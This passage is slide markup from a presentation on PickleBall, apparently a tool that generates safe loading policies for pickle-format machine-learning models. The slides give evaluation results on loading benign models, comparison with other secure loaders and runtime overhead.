                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>84/84</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>201/252</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D9EAD3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>79.8%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D9EAD3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1068" name="Google Shape;1068;p84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="316675" y="896800"/>
            <a:ext cx="3595200" cy="514200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>RQ:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> How well does P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> correctly </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>load benign pickle models</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069" name="Google Shape;1069;p84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4731375" y="896800"/>
            <a:ext cx="3655500" cy="514200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9EAD3"/>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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>loads </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>44 (17.4%) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>more models than secure solutions.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1070" name="Google Shape;1070;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="282315" y="1698196"/>
            <a:ext cx="734799" cy="734799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1071" name="Google Shape;1071;p84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76194" y="1495500"/>
            <a:ext cx="426900" cy="410100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="12925">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="61975" lIns="61975" spcFirstLastPara="1" rIns="61975" wrap="square" tIns="61975">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="949"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1072" name="Google Shape;1072;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="76194" y="1495500"/>
            <a:ext cx="426490" cy="410036"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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76" name="Shape 1076"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077" name="Google Shape;1077;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Evaluation: P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Creates Secure and Usable Policies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1078" name="Google Shape;1078;p85"/>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1079" name="Google Shape;1079;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2013600" y="959225"/>
            <a:ext cx="5116800" cy="393600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>RQ:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> Is P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>’s </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>runtime overhead </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>practical? </a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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83" name="Shape 1083"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1084" name="Google Shape;1084;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Evaluation: P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Creates Secure and Usable Policies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085" name="Google Shape;1085;p86"/>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1086" name="Google Shape;1086;p86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2013600" y="959225"/>
            <a:ext cx="5116800" cy="393600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>RQ:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> Is P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>’s </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>runtime overhead </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>practical? </a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1087" name="Google Shape;1087;p86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="982575" y="2884150"/>
            <a:ext cx="3059700" cy="489300"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9EAD3"/>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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>generates policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>&lt;30 seconds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> per library.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1088" name="Google Shape;1088;p86"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1770200"/>
            <a:ext cx="0" cy="2605800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1089" name="Google Shape;1089;p86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="887925" y="1873625"/>
            <a:ext cx="3249000" cy="393600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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en">
                <a:solidFill>
